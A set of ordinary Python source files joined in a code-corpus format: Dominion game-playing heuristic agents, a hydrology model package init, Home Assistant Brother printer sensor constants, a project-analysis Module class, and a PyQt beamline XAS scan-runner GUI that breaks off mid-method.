            except:
                # The list shrank below idx because of the pops below.
                break
            # NOTE(review): popping while iterating forward skips the element
            # that slides into this slot -- likely why it "does not work".
            if "Bandit" in str(move):  # currently does not work
                decision.moves.pop(idx)
            if "Remodel" in str(move):  # currently does not work
                decision.moves.pop(idx)
class CleverSemiAgent(Agent):
    """Filter out Curse buys and auto-take +action / treasure moves.

    Behaviour is identical to the hand-written original, including the
    in-place pop of Curse buys from the shared decision.
    """

    def policy(self, decision, state):
        if len(decision.moves) == 1:
            return [0]  # forced move: auto-play it
        for idx in range(len(decision.moves)):
            try:
                move = decision.moves[idx]
            except:
                break  # list shrank below idx due to the pops below
            if "Buy: Curse" in str(move):
                decision.moves.pop(idx)
            wants_move = hasattr(move, "card") and (
                move.card.add_actions > 0
                or ("treasure" in decision.prompt.lower() and move.card.coins > 0))
            if wants_move:
                return [idx]
class ApplySemiAgent(Agent):
    """Chain-of-responsibility wrapper over a list of semi-agents.

    Each semi-agent gets a chance to decide; the first non-None answer wins,
    otherwise the full fallback agent decides.
    """

    def __init__(self, semiAgents, agent):
        self.semiAgents = semiAgents
        self.agent = agent

    def policy(self, decision, state):
        for handler in self.semiAgents:
            choice = handler.policy(decision, state)
            if choice is not None:
                return choice
        return self.agent.policy(decision, state)
class BigMoneySemiAgent(Agent):
    """Classic Big Money buy priority: Province, then Gold, then Silver."""

    def policy(self, decision, state):
        for wanted in ("Buy: Province", "Buy: Gold", "Buy: Silver"):
            for index, move in enumerate(decision.moves):
                if wanted in str(move):
                    return [index]
class SmithySemiAgent(Agent):
    """Always play Smithy; buy Smithy while it is under 10% of the deck."""

    def policy(self, decision, state):
        for index, move in enumerate(decision.moves):
            if "Play: Smithy" in str(move):
                return [index]
        all_cards = decision.player.all_cards
        for index, move in enumerate(decision.moves):
            if "Buy: Smithy" in str(move):
                smithy_ratio = sum(1 for c in all_cards if 'Smithy' in str(c)) / len(all_cards)
                if smithy_ratio < 0.1:
                    return [index]
class DontBuyCopperOrEstateSemiAgent(Agent):
    """Semi-agent that removes Copper/Estate buys from the move list.

    Always falls through (returns None) so the next agent decides from the
    filtered list.
    """

    def policy(self, decision, state):
        # BUG FIX: the original popped while iterating forward, which skips
        # the element that slides into the popped slot -- two adjacent
        # Copper/Estate buys could leave one of them in the list.  Rebuilding
        # the list via slice assignment filters correctly while keeping the
        # same (shared) list object.
        decision.moves[:] = [
            move for move in decision.moves
            if 'Buy: Copper' not in str(move) and 'Buy: Estate' not in str(move)
        ]
class MyHeuristicSemiAgent(Agent):
    """Hand-tuned buy heuristic: engine pieces first, buy order randomised.

    On Action prompts, plays Militia or Smithy immediately.  On Buy/gain
    prompts, buys each wished-for card while it is below its target fraction
    of the deck; the wish order is randomised between two variants per call.
    """

    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            for index, move in enumerate(decision.moves):
                text = str(move)
                if 'Militia' in text or 'Smithy' in text:
                    return [index]
        if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
            return
        desired_deck = {'Festival': 1, 'Market': 1, 'Militia': 1, 'Smithy': 0.1, 'Village': 0.2}
        if numpy.random.randint(0, 2, 1, int) == 1:
            # Same caps, different iteration (priority) order.
            desired_deck = {'Market': 1, 'Festival': 1, 'Smithy': 0.1, 'Militia': 1, 'Village': 0.2}
        deck = decision.player.all_cards
        for wish, cap in desired_deck.items():
            for index, move in enumerate(decision.moves):
                if wish in str(move) and sum(1 for c in deck if wish in str(c)) / len(deck) < cap:
                    return [index]
class MarketSemiAgent(Agent):
    """Market-centred heuristic with token Militia/Smithy/Village pickups."""

    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            for index, move in enumerate(decision.moves):
                text = str(move)
                if 'Militia' in text:
                    return [index]
                if 'Smithy' in text and decision.player.actions > 1:
                    return [index]
                if 'Empty' in text:
                    return [index]
        if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
            return
        # Card-name substring -> maximum fraction of the deck to hold.
        desired_deck = {'Market': 1, 'Militia': 0.001, 'Smithy': 0.001, 'Village': 0.2}
        deck = decision.player.all_cards
        for wish, cap in desired_deck.items():
            for index, move in enumerate(decision.moves):
                if wish in str(move):
                    if sum(1 for c in deck if wish in str(c)) / len(deck) < cap:
                        return [index]
class CustomHeuristicsSemiAgent(Agent):
    """Parameterised Market-style heuristic: buy caps supplied at construction."""

    def __init__(self, desired_decks):
        # desired_decks: mapping card-name substring -> max fraction of the deck.
        self.desired_deck = desired_decks

    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            for index, move in enumerate(decision.moves):
                text = str(move)
                if 'Militia' in text:
                    return [index]
                if 'Smithy' in text and decision.player.actions > 1:
                    return [index]
                if 'Empty' in text:
                    return [index]
        if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
            return
        deck = decision.player.all_cards
        for wish, cap in self.desired_deck.items():
            for index, move in enumerate(decision.moves):
                if wish in str(move):
                    if sum(1 for c in deck if wish in str(c)) / len(deck) < cap:
                        return [index]
class MarketNoSmithySemiAgent(Agent):
    """Market-centred heuristic that never buys Smithy (Militia cap 0.1)."""

    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            for index, move in enumerate(decision.moves):
                text = str(move)
                if 'Militia' in text:
                    return [index]
                if 'Smithy' in text and decision.player.actions > 1:
                    return [index]
                if 'Empty' in text:
                    return [index]
        if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
            return
        desired_deck = {'Market': 1, 'Militia': 0.1, 'Village': 0.2}
        deck = decision.player.all_cards
        for wish, cap in desired_deck.items():
            for index, move in enumerate(decision.moves):
                if wish in str(move):
                    if sum(1 for c in deck if wish in str(c)) / len(deck) < cap:
                        return [index]
class MarketNoSmithySemiAgent2(Agent):
    """Variant of MarketNoSmithySemiAgent with a larger Militia cap (0.2)."""

    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            for index, move in enumerate(decision.moves):
                text = str(move)
                if 'Militia' in text:
                    return [index]
                if 'Smithy' in text and decision.player.actions > 1:
                    return [index]
                if 'Empty' in text:
                    return [index]
        if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
            return
        desired_deck = {'Market': 1, 'Militia': 0.2, 'Village': 0.2}
        deck = decision.player.all_cards
        for wish, cap in desired_deck.items():
            for index, move in enumerate(decision.moves):
                if wish in str(move):
                    if sum(1 for c in deck if wish in str(c)) / len(deck) < cap:
                        return [index]
class OnlyBuyCopperIfSemiAgent(Agent):
    """Buy Copper only while the deck's total treasure value is below 5.

    When rich enough, Copper buys are removed from the move list so later
    agents cannot pick them; the method then falls through (None).
    """

    def policy(self, decision, state):
        # Hoisted: the original re-summed the whole deck for every Copper move.
        deck_coins = sum(c.coins for c in decision.player.all_cards)
        for index, move in enumerate(decision.moves):
            if 'Buy: Copper' in str(move):
                if deck_coins < 5:
                    return [index]
                # BUG FIX: the original popped while iterating forward, which
                # can skip a second adjacent Copper buy.  Rebuild in place so
                # every Copper buy is removed.
                decision.moves[:] = [m for m in decision.moves
                                     if 'Buy: Copper' not in str(m)]
                return None
class ChapelSemiAgent(Agent):
    """Chapel strategy: buy one Chapel early, then trash Estates (and excess
    Coppers) with it.

    Decisions this class does not handle fall through (implicit None).
    """
    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            # Play Chapel whenever an Estate is in hand to trash.
            for c in decision.player.hand:
                if 'Estate' in str(c):
                    for idx in range(0, len(decision.moves)):
                        if 'Play: Chapel' in str(decision.moves[idx]):
                            return [idx]
        if 'Trash up to 4' in decision.prompt:
            moves = []
            # First pass: trash Estates (up to 4 selections total).
            for idx in range(0, len(decision.moves)):
                if len(moves) >= 4:
                    break
                try:
                    move = decision.moves[idx]
                except:
                    break
                if "Choose: Estate" in move.__str__():
                    moves.append(idx)
            # Second pass: trash Coppers while keeping > 5 coins of treasure.
            for idx in range(0, len(decision.moves)):
                if len(moves) >= 4:
                    break
                try:
                    move = decision.moves[idx]
                except:
                    break
                # NOTE(review): `moves` holds integer indices, so
                # 'Copper' in str(planned_move) is never true -- the planned
                # trashes are not actually subtracted from the treasure total.
                if "Choose: Copper" in move.__str__() and (
                        sum(c.coins for c in decision.player.all_cards) -
                        sum(1 for planned_move in moves if 'Copper' in str(planned_move)) > 5):
                    moves.append(idx)
            return moves
        if 'Buy' in decision.prompt:
            # Buy a single Chapel on a low-coin turn if we own none yet.
            for idx in range(0, len(decision.moves)):
                try:
                    move = decision.moves[idx]
                except:
                    break
                if 'Buy: Chapel' in str(move) and decision.player.coins < 4 and (
                        sum(1 for c in decision.player.all_cards if 'Chapel' in str(c)) == 0):
                    return [idx]
class AggressiveChapelSemiAgent(ChapelSemiAgent):
    """More aggressive Chapel strategy: also plays Chapel to trash Coppers
    while the deck is treasure-rich, and strips redundant Chapel buys.

    Fully overrides ChapelSemiAgent.policy.
    """
    def policy(self, decision, state):
        if 'Action' in decision.prompt:
            for c in decision.player.hand:
                if 'Estate' in str(c) or ('Copper' in str(c) and sum(c.coins for c in decision.player.all_cards) > 5):
                    for idx in range(0, len(decision.moves)):
                        if 'Play: Chapel' in str(decision.moves[idx]):
                            return [idx]
        if 'Trash' in decision.prompt:
            moves = []
            # First pass: trash Estates (up to 4 selections total).
            for idx in range(0, len(decision.moves)):
                if len(moves) >= 4:
                    break
                try:
                    move = decision.moves[idx]
                except:
                    break
                if "Choose: Estate" in str(move):
                    moves.append(idx)
            # Second pass: trash Coppers while more than 5 coins of treasure
            # would remain after the already-planned Copper trashes.
            for idx in range(0, len(decision.moves)):
                if len(moves) >= 4:
                    break
                try:
                    move = decision.moves[idx]
                except:
                    break
                if "Choose: Copper" in str(move) and (
                        sum(c.coins for c in decision.player.all_cards) -
                        sum(1 for planned_move in moves if 'Copper' in str(decision.moves[planned_move])) > 5):
                    moves.append(idx)
            return moves
        for idx in range(0, len(decision.moves)):
            try:
                move = decision.moves[idx]
            except:
                break
            # NOTE(review): after this pop, `idx` no longer points at `move`;
            # the following check can return an index for a *different* move,
            # and the forward pop can skip the element sliding into this slot.
            if "Buy: Chapel" in str(move) and (sum(1 for c in decision.player.all_cards if 'Chapel' in str(c)) > 0):
                decision.moves.pop(idx)
            if "Buy: Chapel" in str(move) and decision.player.coins < 4 and (
                    sum(1 for c in decision.player.all_cards if 'Chapel' in str(c)) == 0):
                return [idx]
class ProvinceSemiAgent(Agent):
    """Buy a Province whenever one is offered; otherwise fall through."""

    def policy(self, decision, state):
        for index, move in enumerate(decision.moves):
            if "Buy: Province" in str(move):
                return [index]
class ProvinceNeverLoseSemiAgent(Agent):
    """Buy Provinces, but take a Duchy instead of the last Province when even
    that Province (6 VP) would still leave us behind the best opponent."""

    def policy(self, decision, state):
        wanted = "Buy: Province"
        if state.supply_piles['Province'].qty == 1:
            best_opponent_vp = max(state.other_players,
                                   key=lambda pr: pr.total_vp()).total_vp()
            if 6 + decision.player.total_vp() < best_opponent_vp:
                wanted = "Buy: Duchy"
        for index, move in enumerate(decision.moves):
            if wanted in str(move):
                return [index]
| StarcoderdataPython |
4929424 | <reponame>pymt-lab/pymt_prms_soil<filename>pymt_prms_soil/__init__.py<gh_stars>0
#! /usr/bin/env python
import pkg_resources
# Resolve the installed package version from setuptools metadata.
__version__ = pkg_resources.get_distribution("pymt_prms_soil").version

from .bmi import PRMSSoil

# Public API of the package.
__all__ = [
    "PRMSSoil",
]
| StarcoderdataPython |
6626851 | <reponame>tbarbette/core<filename>homeassistant/components/brother/const.py<gh_stars>1-10
"""Constants for Brother integration."""
from homeassistant.const import ATTR_ICON, PERCENTAGE
# Attribute keys for values reported by the `brother` library.
# "*_remaining_life" / "*_remaining" values are percentages, "*_counter"
# values are page counts.  ATTR_ENABLED / ATTR_LABEL / ATTR_UNIT (together
# with ATTR_ICON from homeassistant.const) are the keys of each
# SENSOR_TYPES description dict, not printer attributes.
ATTR_BELT_UNIT_REMAINING_LIFE = "belt_unit_remaining_life"
ATTR_BLACK_DRUM_COUNTER = "black_drum_counter"
ATTR_BLACK_DRUM_REMAINING_LIFE = "black_drum_remaining_life"
ATTR_BLACK_DRUM_REMAINING_PAGES = "black_drum_remaining_pages"
ATTR_BLACK_INK_REMAINING = "black_ink_remaining"
ATTR_BLACK_TONER_REMAINING = "black_toner_remaining"
ATTR_BW_COUNTER = "b/w_counter"
ATTR_COLOR_COUNTER = "color_counter"
ATTR_CYAN_DRUM_COUNTER = "cyan_drum_counter"
ATTR_CYAN_DRUM_REMAINING_LIFE = "cyan_drum_remaining_life"
ATTR_CYAN_DRUM_REMAINING_PAGES = "cyan_drum_remaining_pages"
ATTR_CYAN_INK_REMAINING = "cyan_ink_remaining"
ATTR_CYAN_TONER_REMAINING = "cyan_toner_remaining"
ATTR_DRUM_COUNTER = "drum_counter"
ATTR_DRUM_REMAINING_LIFE = "drum_remaining_life"
ATTR_DRUM_REMAINING_PAGES = "drum_remaining_pages"
ATTR_DUPLEX_COUNTER = "duplex_unit_pages_counter"
ATTR_ENABLED = "enabled"
ATTR_FUSER_REMAINING_LIFE = "fuser_remaining_life"
ATTR_LABEL = "label"
ATTR_LASER_REMAINING_LIFE = "laser_remaining_life"
ATTR_MAGENTA_DRUM_COUNTER = "magenta_drum_counter"
ATTR_MAGENTA_DRUM_REMAINING_LIFE = "magenta_drum_remaining_life"
ATTR_MAGENTA_DRUM_REMAINING_PAGES = "magenta_drum_remaining_pages"
ATTR_MAGENTA_INK_REMAINING = "magenta_ink_remaining"
ATTR_MAGENTA_TONER_REMAINING = "magenta_toner_remaining"
ATTR_MANUFACTURER = "Brother"
ATTR_PAGE_COUNTER = "page_counter"
ATTR_PF_KIT_1_REMAINING_LIFE = "pf_kit_1_remaining_life"
ATTR_PF_KIT_MP_REMAINING_LIFE = "pf_kit_mp_remaining_life"
ATTR_STATUS = "status"
ATTR_UNIT = "unit"
ATTR_UPTIME = "uptime"
ATTR_YELLOW_DRUM_COUNTER = "yellow_drum_counter"
ATTR_YELLOW_DRUM_REMAINING_LIFE = "yellow_drum_remaining_life"
ATTR_YELLOW_DRUM_REMAINING_PAGES = "yellow_drum_remaining_pages"
ATTR_YELLOW_INK_REMAINING = "yellow_ink_remaining"
ATTR_YELLOW_TONER_REMAINING = "yellow_toner_remaining"
# hass.data key and the integration domain.
DATA_CONFIG_ENTRY = "config_entry"
DOMAIN = "brother"
# Unit of measurement shown for page counters.
UNIT_PAGES = "p"
# Printer technologies supported by the config flow.
PRINTER_TYPES = ["laser", "ink"]
SNMP = "snmp"
def _title(attr):
    """Human-readable label from an attribute key ('page_counter' -> 'Page Counter')."""
    return attr.replace("_", " ").title()


def _description(icon, attr, unit, enabled=True):
    """Build one sensor-description dict (icon / label / unit / enabled-by-default)."""
    return {
        ATTR_ICON: icon,
        ATTR_LABEL: _title(attr),
        ATTR_UNIT: unit,
        ATTR_ENABLED: enabled,
    }


# Descriptions for every sensor the integration can expose.  Built
# programmatically because whole groups of entries share icon and unit;
# insertion order matches the original hand-written mapping (it determines
# the order entities are created in).
SENSOR_TYPES = {
    ATTR_STATUS: _description("mdi:printer", ATTR_STATUS, None),
}
# Page counters.
for _attr in (ATTR_PAGE_COUNTER, ATTR_BW_COUNTER, ATTR_COLOR_COUNTER, ATTR_DUPLEX_COUNTER):
    SENSOR_TYPES[_attr] = _description("mdi:file-document-outline", _attr, UNIT_PAGES)
# Drum remaining-life percentages.
for _attr in (
    ATTR_DRUM_REMAINING_LIFE,
    ATTR_BLACK_DRUM_REMAINING_LIFE,
    ATTR_CYAN_DRUM_REMAINING_LIFE,
    ATTR_MAGENTA_DRUM_REMAINING_LIFE,
    ATTR_YELLOW_DRUM_REMAINING_LIFE,
):
    SENSOR_TYPES[_attr] = _description("mdi:chart-donut", _attr, PERCENTAGE)
# Other consumable units.
SENSOR_TYPES[ATTR_BELT_UNIT_REMAINING_LIFE] = _description("mdi:current-ac", ATTR_BELT_UNIT_REMAINING_LIFE, PERCENTAGE)
SENSOR_TYPES[ATTR_FUSER_REMAINING_LIFE] = _description("mdi:water-outline", ATTR_FUSER_REMAINING_LIFE, PERCENTAGE)
SENSOR_TYPES[ATTR_LASER_REMAINING_LIFE] = _description("mdi:spotlight-beam", ATTR_LASER_REMAINING_LIFE, PERCENTAGE)
for _attr in (ATTR_PF_KIT_1_REMAINING_LIFE, ATTR_PF_KIT_MP_REMAINING_LIFE):
    SENSOR_TYPES[_attr] = _description("mdi:printer-3d", _attr, PERCENTAGE)
# Toner (laser) and ink (inkjet) levels.
for _attr in (
    ATTR_BLACK_TONER_REMAINING,
    ATTR_CYAN_TONER_REMAINING,
    ATTR_MAGENTA_TONER_REMAINING,
    ATTR_YELLOW_TONER_REMAINING,
    ATTR_BLACK_INK_REMAINING,
    ATTR_CYAN_INK_REMAINING,
    ATTR_MAGENTA_INK_REMAINING,
    ATTR_YELLOW_INK_REMAINING,
):
    SENSOR_TYPES[_attr] = _description("mdi:printer-3d-nozzle", _attr, PERCENTAGE)
# Uptime is diagnostic-only: disabled by default.
SENSOR_TYPES[ATTR_UPTIME] = _description(None, ATTR_UPTIME, None, enabled=False)
| StarcoderdataPython |
3210946 | from typing import TYPE_CHECKING, List, Optional
if TYPE_CHECKING:
from projectreport.analyzer.project import Project
from projectreport.analyzer.parsers.base import Parser
import os
from cached_property import cached_property
from projectreport.analyzer.analysis import ModuleAnalysis
from projectreport.analyzer.analyzable import Analyzable
from projectreport.analyzer.parsers.index import PARSER_EXTENSIONS
class Module(Analyzable):
    """A single source file inside a project, analysable on its own."""

    def __init__(
        self,
        path: str,
        package: Optional[str] = None,
        project: Optional["Project"] = None,
    ):
        stem, ext = os.path.splitext(path)
        self.name = os.path.basename(stem)
        self.extension = ext.strip(".")
        # A stand-alone module defaults to a package named after itself.
        self.package = package if package is not None else self.name
        super().__init__(path, project=project)
        self.analysis = ModuleAnalysis(self)

    @cached_property
    def parser(self) -> Optional["Parser"]:
        """Parser instance for this file's extension, or None if unsupported."""
        parser_cls = PARSER_EXTENSIONS.get(self.extension)
        return None if parser_cls is None else parser_cls(self.path)
| StarcoderdataPython |
240096 | import datetime
from timeit import default_timer as timer
import numpy as np
import pkg_resources
from PyQt5 import uic, QtCore
from matplotlib.backends.backend_qt5agg import (
FigureCanvasQTAgg as FigureCanvas,
NavigationToolbar2QT as NavigationToolbar)
from matplotlib.figure import Figure
from xas.xray import generate_energy_grid
from isstools.dialogs.BasicDialogs import question_message_box, message_box
from isstools.elements.figure_update import update_figure
from isstools.elements.parameter_handler import parse_plan_parameters, return_parameters_from_widget
from isstools.widgets import widget_energy_selector
from bluesky.callbacks import LivePlot
from ..elements.liveplots import XASPlot#, XASPlotX
ui_path = pkg_resources.resource_filename('isstools', 'ui/ui_run.ui')
class UIRun(*uic.loadUiType(ui_path)):
def __init__(self,
plan_funcs=None,
aux_plan_funcs=None,
RE=None,
db=None,
hhm=None,
detector_dict=None,
shutter_dict=None,
motor_dict=None,
apb=None,
parent=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.setupUi(self)
self.addCanvas()
# TODO : remove hhm dependency
self.plan_funcs = plan_funcs
self.plan_funcs_names = plan_funcs.keys()
self.aux_plan_funcs = aux_plan_funcs
self.RE = RE
self.db = db
self.hhm=hhm,
self.detector_dict = detector_dict
self.shutter_dictionary = shutter_dict
self.motor_dictionary = motor_dict
self.apb = apb
self.parent = parent
self.comboBox_scan_type.addItems(self.plan_funcs_names)
self.comboBox_scan_type.currentIndexChanged.connect(self.populate_parameter_grid)
self.push_run_scan.clicked.connect(self.run_scan)
self.push_run_test_scan.clicked.connect(self.run_test_scan)
# List with uids of scans created in the "run" mode:
self.run_mode_uids = []
self.rr_token = None
self.parameter_values = []
self.parameter_descriptions = []
self.populate_parameter_grid(0)
self.widget_energy_selector = widget_energy_selector.UIEnergySelector()
self.layout_energy_selector.addWidget(self.widget_energy_selector)
self.push_info_from_autopilot.clicked.connect(self.get_info_from_autopilot)
self.energy_grid = []
## Persistance of parameters:
self.settings = parent.settings
self.widget_energy_selector.comboBox_element.setCurrentIndex(self.settings.value('step_element_index', defaultValue=0, type=int)) #
self.widget_energy_selector.comboBox_edge.setCurrentIndex(self.settings.value('step_edge_index', defaultValue=0, type=int)) #
self.edit_preedge_spacing.setText(self.settings.value('step_preedge_spacing', defaultValue='10', type=str)) #
self.edit_xanes_spacing.setText(self.settings.value('step_xanes_spacing', defaultValue='10', type=str)) #
self.edit_exafs_spacing.setText(self.settings.value('step_exafs_spacing', defaultValue='1', type=str)) #
self.edit_preedge_start.setText(self.settings.value('step_preedge_start', defaultValue='-100', type=str)) #
self.edit_xanes_start.setText(self.settings.value('step_xanes_start', defaultValue='-30', type=str)) #
self.edit_xanes_end.setText(self.settings.value('step_xanes_end', defaultValue='30', type=str)) #
self.edit_exafs_end.setText(self.settings.value('step_exafs_end', defaultValue='6', type=str)) #
self.edit_preedge_dwell.setText(self.settings.value('step_preedge_dwell', defaultValue='1', type=str)) #
self.edit_xanes_dwell.setText(self.settings.value('step_xanes_dwell', defaultValue='1', type=str))
self.edit_exafs_dwell.setText(self.settings.value('step_exafs_dwell', defaultValue='1', type=str))
self.comboBox_exafs_dwell_kpower.setCurrentIndex(self.settings.value('step_exafs_dwell_kpower_index', defaultValue=0, type=int))
## connect energy_selector layout
self.widget_energy_selector.edit_E0.textChanged.connect(self.update_E0)
self.widget_energy_selector.comboBox_edge.currentTextChanged.connect(self.update_edge)
self.widget_energy_selector.comboBox_element.currentTextChanged.connect(self.update_element)
self.element = self.widget_energy_selector.comboBox_element.currentText()
self.edge = self.widget_energy_selector.comboBox_edge.currentText()
self.e0 = self.widget_energy_selector.edit_E0.text()
def _save_step_scan_settings(self):
    """Persist the current step-scan widget state to QSettings.

    Stores the element/edge combo indices, the region spacings and
    boundaries, the dwell times, and the EXAFS dwell k-power under the
    same keys that __init__ reads back on the next start-up.
    """
    # Combo boxes whose current *index* is stored under the given key.
    index_widgets = {
        'step_element_index': self.widget_energy_selector.comboBox_element,
        'step_edge_index': self.widget_energy_selector.comboBox_edge,
        'step_exafs_dwell_kpower_index': self.comboBox_exafs_dwell_kpower,
    }
    # Line edits whose current *text* is stored under the given key.
    text_widgets = {
        'step_preedge_spacing': self.edit_preedge_spacing,
        'step_xanes_spacing': self.edit_xanes_spacing,
        'step_exafs_spacing': self.edit_exafs_spacing,
        'step_preedge_start': self.edit_preedge_start,
        'step_xanes_start': self.edit_xanes_start,
        'step_xanes_end': self.edit_xanes_end,
        'step_exafs_end': self.edit_exafs_end,
        'step_preedge_dwell': self.edit_preedge_dwell,
        'step_xanes_dwell': self.edit_xanes_dwell,
        'step_exafs_dwell': self.edit_exafs_dwell,
    }
    for key, combo in index_widgets.items():
        self.settings.setValue(key, combo.currentIndex())
    for key, edit in text_widgets.items():
        self.settings.setValue(key, edit.text())
def addCanvas(self):
    """Create the matplotlib figure/canvas and embed it in the widget.

    Builds one primary axis (ax1) plus two twin y-axes (ax2, ax3) that
    share the energy x-axis, so transmission / fluorescence / reference
    traces can be plotted with independent y scales.
    """
    self.figure = Figure()
    self.figure.set_facecolor(color='#FcF9F6')
    self.canvas = FigureCanvas(self.figure)
    self.figure.ax1 = self.figure.add_subplot(111)
    # Twin axes share x with ax1 but carry their own y scaling.
    self.figure.ax2 = self.figure.ax1.twinx()
    self.figure.ax3 = self.figure.ax1.twinx()
    self.toolbar = NavigationToolbar(self.canvas, self, coordinates=True)
    self.plots.addWidget(self.toolbar)
    self.plots.addWidget(self.canvas)
    # Grid drawn on the top-most axis so it overlays all traces.
    self.figure.ax3.grid(alpha=0.4)
    self.canvas.draw_idle()
def run_test_scan(self):
    """Run a one-repeat scan with the name prefixed by 'test ', then
    restore the original name and repeat count in the widgets.

    Assumes parameter_values[0] is the scan-name widget and
    parameter_values[2] the repeat-count widget — TODO confirm against
    the plan parameter layout.
    """
    name = self.parameter_values[0].text()
    repeats = self.parameter_values[2].value()
    self.parameter_values[0].setText(f'test {name}')
    self.parameter_values[2].setValue(1)
    self.run_scan()
    # Restore the user's original values after the test run.
    self.parameter_values[0].setText(name)
    self.parameter_values[2].setValue(repeats)
def run_scan(self):
    """Validate preconditions, assemble plan arguments and live plots for
    the selected scan type, and submit the plan to the RunEngine.

    Returns False if the user aborts because a shutter is closed;
    otherwise returns None (the uids end up in self.run_mode_uids).
    """
    ignore_shutter = False
    energy_grid = []
    time_grid = []
    # Check every non-setpoint ('SP') shutter; if one is closed, ask the
    # user whether to proceed with it closed.
    for shutter in [self.shutter_dictionary[shutter] for shutter in self.shutter_dictionary if
                    self.shutter_dictionary[shutter].shutter_type != 'SP']:
        # shutter.state may be a plain string or a signal with .value —
        # presumably device-type dependent; verify against the devices.
        if type(shutter.state) == str:
            isclosed = (shutter.state == 'closed')
        else:
            isclosed = (shutter.state.value == 1)
        if isclosed:
            ret = question_message_box(self, 'Shutter closed',
                                       'Would you like to run the scan with the shutter closed?')
            if not ret:
                print('Aborted!')
                return False
            ignore_shutter = True
            break
    name_provided = self.parameter_values[0].text()
    if name_provided:
        timenow = datetime.datetime.now()
        # NOTE(review): flush='true' is passed to str.format (where it is
        # silently ignored), not to print — looks like a misplaced kwarg.
        print('\nStarting scan at {}'.format(timenow.strftime("%H:%M:%S"), flush='true'))
        start_scan_timer = timer()
        # Get parameters from the widgets and organize them in a dictionary (run_params)
        run_parameters = return_parameters_from_widget(self.parameter_descriptions, self.parameter_values,
                                                       self.parameter_types)
        # Run the scan using the dict created before
        self.run_mode_uids = []
        self.parent.run_mode = 'run'
        plan_key = self.comboBox_scan_type.currentText()
        if plan_key.lower().startswith('step scan'):
            # Step scans need an explicit energy/dwell grid built from the
            # widget values (regions specified relative to E0).
            update_figure([self.figure.ax2, self.figure.ax1, self.figure.ax3], self.toolbar, self.canvas)
            print(f'E0 {self.e0}')
            energy_grid, time_grid = generate_energy_grid(float(self.e0),
                                                          float(self.edit_preedge_start.text()),
                                                          float(self.edit_xanes_start.text()),
                                                          float(self.edit_xanes_end.text()),
                                                          float(self.edit_exafs_end.text()),
                                                          float(self.edit_preedge_spacing.text()),
                                                          float(self.edit_xanes_spacing.text()),
                                                          float(self.edit_exafs_spacing.text()),
                                                          float(self.edit_preedge_dwell.text()),
                                                          float(self.edit_xanes_dwell.text()),
                                                          float(self.edit_exafs_dwell.text()),
                                                          int(self.comboBox_exafs_dwell_kpower.currentText())
                                                          )
        plan_func = self.plan_funcs[plan_key]
        _scanning_motor = 'hhm'
        # Optional Pilatus 100k live plot: XES when scanning the emission
        # spectrometer, HERFD when scanning the monochromator.
        try:
            self.pil100k = self.detector_dict['Pilatus 100k']['device'].stats1.total
            if 'emission' in plan_key.lower():
                label = 'XES'
                _scanning_motor = 'emission'
                LivePlotPilatus = XASPlot(self.pil100k.name, self.apb.ch1_mean.name, label, self.motor_dictionary['motor_emission']['object'].energy.name,
                                          log=False, ax=self.figure.ax1, color='k', legend_keys=[label])
            else:
                label = 'HERFD'
                LivePlotPilatus = XASPlot(self.pil100k.name, self.apb.ch1_mean.name, label, self.hhm[0].energy.name,
                                          log=False, ax=self.figure.ax1, color='k', legend_keys=[label])
        except:
            # Detector not configured — skip its live plot.
            LivePlotPilatus = None
        # Optional Xspress3 SDD live plot.
        try:
            _xs = self.detector_dict['Xspress3']['device'].channel1.rois.roi01.value
            _xs_at = self.detector_dict['Xspress3']['device'].settings.acquire_time
            # self.motor_dictionary['motor_emission']['name']
            LivePlotXspress3 = XASPlot(_xs.name, self.apb.ch1_mean.name, 'SDD', self.hhm[0].energy.name,
                                       log=False, ax=self.figure.ax1, color='m', legend_keys=['SDD ch1-roi1'])
        except:
            LivePlotXspress3 = None
        # Standard transmission/reference/fluorescence plots only apply
        # when the monochromator is the scanned motor.
        if _scanning_motor == 'hhm':
            LivePlots = [
                XASPlot(self.apb.ch1_mean.name, self.apb.ch2_mean.name, 'Transmission', self.hhm[0].energy.name,
                        log=True, ax=self.figure.ax1, color='b', legend_keys=['Transmission']),
                XASPlot(self.apb.ch2_mean.name, self.apb.ch3_mean.name, 'Reference', self.hhm[0].energy.name,
                        log=True, ax=self.figure.ax1, color='r', legend_keys=['Reference']),
                XASPlot(self.apb.ch4_mean.name, self.apb.ch1_mean.name, 'Fluorescence', self.hhm[0].energy.name,
                        log=False, ax=self.figure.ax1, color='g', legend_keys=['Fluorescence']),
            ]
        else:
            LivePlots = []
        RE_args = [plan_func(**run_parameters,
                             ignore_shutter=ignore_shutter,
                             energy_grid=energy_grid,
                             time_grid=time_grid,
                             element=self.element,
                             e0=self.e0,
                             edge=self.edge,
                             ax=self.figure.ax1,
                             stdout=self.parent.emitstream_out)]
        if plan_key.lower().endswith('pilatus'):
            if LivePlotPilatus:
                LivePlots.append(LivePlotPilatus)
        if plan_key.lower().endswith('xspress 3'):
            if LivePlotXspress3:
                LivePlots.append(LivePlotXspress3)
        if plan_key.lower().startswith('step scan'):
            # Only step-scan plans take the live-plot list as a second arg.
            RE_args.append(LivePlots)
        self._save_step_scan_settings()
        self.run_mode_uids = self.RE(*RE_args)
        timenow = datetime.datetime.now()
        print('Scan complete at {}'.format(timenow.strftime("%H:%M:%S")))
        stop_scan_timer = timer()
        print('Scan duration {} s'.format(stop_scan_timer - start_scan_timer))
        if self.rr_token is not None:
            self.RE.unsubscribe(self.rr_token)
    else:
        message_box('Error', 'Please provide the name for the scan')
def populate_parameter_grid(self, index):
    """Rebuild the parameter widget grid for the newly selected scan type.

    Connected to the scan-type combo box; `index` is supplied by the
    signal but the plan is looked up by its current text instead.
    """
    # Remove and destroy the widgets that belonged to the previous plan.
    for i in range(len(self.parameter_values)):
        self.gridLayout_parameters.removeWidget(self.parameter_values[i])
        self.gridLayout_parameters.removeWidget(self.parameter_descriptions[i])
